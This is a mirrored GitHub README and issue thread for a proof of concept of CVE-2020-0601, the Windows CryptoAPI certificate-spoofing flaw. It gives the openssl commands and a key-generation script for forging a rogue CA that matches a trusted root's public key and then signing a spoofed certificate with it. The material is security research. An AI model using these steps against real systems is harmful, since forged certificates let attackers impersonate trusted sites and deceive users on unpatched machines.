GithubHelp home page GithubHelp logo

chainoffools's Introduction

CryptoAPI

CVE-2020-0601: Windows CryptoAPI Spoofing Vulnerability exploitation. More information in our blog post.

Install requirements

pip install -U -r requirements.txt

The certificate generation works with OpenSSL verion up to 1.0.2u.

CA certificate

We used the USERTrust ECC Certification Authority but it can be any root certificate working on P-384 curve.

To generate a private key which match the public key from the root certificate we used the script gen-key.py (works with Python 3.6 and above):

$ ./gen-key.py RootCert.pem

The key can be displayed with:

$ openssl ec -in p384-key-rogue.pem -text

Then to generate the rogue CA:

$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500

Then we generate the following private key and certificate:

openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem

openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr

openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf

Finally to have the complete chain in a single file we concatenate the CA and the server certificates:

cat client-cert.pem ca-rogue.pem > cert.pem

chainoffools's People

Contributors

orenshp avatar sylvainpelissier avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Forkers

ajphdiv aleclangford materaj2 heikipikker m4rm0k askyeye yanshu911 gkfnf killvxk atorninja crackercat barnhartguy sgnls malleum-inc wgpsec devzero2000 mlynchcogent rhoska bioless limpid94 0xfatty pentestbr cyberopsninja glen-kurtz itzdan gerbilsoft 362902755 ellerbrock unsecureio alecakin gr3yr0n1n inosec2 neodingo wjcxk21 tzf-omkey aftern00n amjiyu airman604 anhkhoa14592 awesome-security 5aikat akpotter dor0n orenshp saloshp dipsec alehacksp jonz-secops tmnc goofwear wxh0000mm snemes tounsi007 a11en4 morimori5 luciferoo futurebody kaisaryousuf mochizuki3310 crazyguitar alifeline rednixon 5l1v3r1 hittimes lager1 mihabin no-47 bb33bb vjingbi f1d094 morelli690 leepapa limkokholefork cve-vuln inarikami polling-repo-continua dekoder lotusexpeditor 3453-315h tricleoo momolou ggliks jrandomsage gmh5225 websecresearch

chainoffools's Issues

format error ?

0x00 Format error ?

test on python2.7.12 and python3.5

>>> privkey = unhexlify(f'{privkey:x}'.encode())
  File "<stdin>", line 1
    privkey = unhexlify(f'{privkey:x}'.encode())
                                     ^
SyntaxError: invalid syntax
>>> 
>>> rogueG = privkey_inv * Q
>>> rogueG = unhexlify(b"04" + f'{rogueG.x:x}'.encode() + f'{rogueG.y:x}'.encode())
  File "<stdin>", line 1
    rogueG = unhexlify(b"04" + f'{rogueG.x:x}'.encode() + f'{rogueG.y:x}'.encode())
                                             ^
SyntaxError: invalid syntax

Windows does not have enough information to verify this certificate

The result certificate from the code is not fully trusted on Windows 10. The root certificate is trusted on the test machine but the generated client certificate is not. The generated certificate does not have enough information to build the trust chain. e.g. AIA or AKI.

Edit: The spoofed CA certificate needs to be included in the chain/bundle.

The certificate issuer not found

Hi Guys, great job done with this PoC, thanks for that.

Followed the steps you mentioned, however I am getting "The issuer of this certificate could not be found."

Used Apache2 on Centos7:
SSLCertificateKeyFile .../prime256v1-privkey.pem
SSLCertificateFile .../client-cert.pem

Could you please give a hint what is wrong with my config?

Thanks in advance.

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.